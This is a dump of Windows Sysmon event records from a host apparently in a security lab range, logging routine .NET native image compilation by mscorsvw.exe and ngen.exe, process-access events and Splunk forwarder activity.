EventRecordID=20245; EventID=11 (FileCreate); RuleName=DLL; UtcTime=2021-06-23 21:03:44.581; ProcessGuid={4DB9351A-A1B0-60D3-5603-00000000CF01}; ProcessId=7004; Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe; TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b5c-0\Microsoft.Build.Framework.dll; CreationUtcTime=2021-06-23 21:03:44.581
23542300x800000000000000020244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.487{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C72D9AD6879411B9FBEB73F114602E8,SHA256=3AE53C1DF4CC988FEF286D1FEF5D0434D277E5C5C0A2FA58184BE61EE8615B50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.331{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.284{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:44.284{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B0-60D3-5603-00000000CF01}7004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:44.238{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B0-60D3-5503-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:44.206{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B0-60D3-5503-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:44.206{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B0-60D3-5503-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000020237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.260{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61417-false10.0.1.12-8000- 11241100x800000000000000020236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:03:44.018{4DB9351A-A1AF-60D3-5403-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19fc-0\Microsoft.Build.Engine.dll2021-06-23 21:03:44.018 23542300x800000000000000020253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:45.487{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B114377E7E5F48116D2D4885CD863A,SHA256=C12BB306CB87D47607774032F289710BDE4B9DD0DDE5907B199B571427C09981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:45.206{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE731583B4D12B527619E173FDBE597A,SHA256=EA0CC829413CE66BA2195FFA7D3949777406BFC3EB638E696019DA44A0241F75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:46.972{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.956{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:46.956{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B2-60D3-5A03-00000000CF01}2488C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:46.893{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B2-60D3-5903-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.862{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B2-60D3-5903-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:46.862{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B2-60D3-5903-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:46.690{4DB9351A-A1B0-60D3-5803-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\195c-0\Microsoft.Build.Tasks.v4.0.dll2021-06-23 21:03:46.690 23542300x800000000000000020254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:46.503{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215A2EDE2C788C3E86882235CED8DF64,SHA256=D071A4BE89EF90C7CFE2D8DAAAE62C0E2721EFB35DFD899C9C320E8BFFDBEB15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.940{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA7EFDBAAA39ED2A65F6B1FB5B460ABA,SHA256=BE0918CF321427C7ECD37051F2201167690B3579020F051365098EB72C5B2857,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.800{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:47.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.784{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5E03-00000000CF01}6496C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:47.721{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5D03-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.706{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5D03-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:47.706{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B3-60D3-5D03-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:47.690{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1320-0\Microsoft.CertificateServices.Deployment.Common.dll2021-06-23 21:03:47.690 10341000x800000000000000020269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:47.612{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:47.596{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B3-60D3-5C03-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
